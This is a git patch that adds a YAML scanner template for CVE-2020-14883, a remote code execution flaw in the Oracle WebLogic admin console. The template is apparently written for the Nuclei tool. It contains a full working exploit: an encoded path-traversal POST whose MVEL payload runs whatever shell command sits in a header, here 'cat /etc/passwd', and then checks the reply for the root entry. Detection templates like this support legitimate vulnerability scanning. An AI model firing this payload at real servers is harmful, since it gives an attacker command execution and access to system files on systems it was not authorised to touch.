From a37c71f7cd61f32d7b6bbec51a00326393617af4 Mon Sep 17 00:00:00 2001
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com>
Date: Sun, 21 Mar 2021 08:03:59 +0000
Subject: [PATCH] Create CVE-2020-14883.yaml

---
 cves/2020/CVE-2020-14883.yaml | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 cves/2020/CVE-2020-14883.yaml

diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml
new file mode 100644
index 0000000000..3189599b91
--- /dev/null
+++ b/cves/2020/CVE-2020-14883.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-14883
+
+info:
+  name: Oracle WebLogic Server Administration Console Handle RCE
+  author: pdteam
+  severity: critical
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
+  tags: cve,cve2020,oracle,rce
+
+#vulnerabilty version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 , 14.1.1.0.0
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal"
+    headers:
+        Content-Type: application/x-www-form-urlencoded
+        Test-Header: cat /etc/passwd
+    body: |
+        test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        condition: and
+
+      - type: status
+        status:
+          - 200